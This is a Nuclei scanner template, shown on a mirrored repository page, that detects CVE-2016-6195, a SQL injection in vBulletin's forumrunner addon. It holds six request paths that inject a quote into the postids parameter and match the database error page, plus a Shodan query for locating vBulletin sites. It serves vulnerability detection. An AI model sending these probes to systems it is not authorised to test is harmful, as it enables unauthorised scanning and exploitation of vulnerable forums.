daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2016/CVE-2016-6195.yaml

59 lines
2.2 KiB
YAML
Raw Blame History

id: CVE-2016-6195
info:
name: vBulletin <= 4.2.3 - SQL Injection
author: MaStErChO
severity: critical
description: |
vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
remediation: |
Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
reference:
- https://www.cvedetails.com/cve/CVE-2016-6195/
- https://www.exploit-db.com/exploits/38489
- https://enumerated.wordpress.com/2016/07/11/1/
- http://www.vbulletin.org/forum/showthread.php?t=322848
- https://github.com/drewlong/vbully
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-6195
cwe-id: CWE-89
epss-score: 0.00284
epss-percentile: 0.65148
cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 6
vendor: vbulletin
product: vbulletin
shodan-query: title:"Powered By vBulletin"
tags: cve,cve2016,vbulletin,sqli,forum,edb
http:
- method: GET
path:
- "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
- "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "type=dberror"
- type: status
status:
- 200
- 503
condition: or
# digest: 4a0a00473045022100e093bbfa532cec4e013de8e2ddfaa42554165ea6ed4891f250ad385bdeb00cd902203509597a1face431c2c291d07e6e9a583ba13d6223d358018b78cb4495437cd7:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink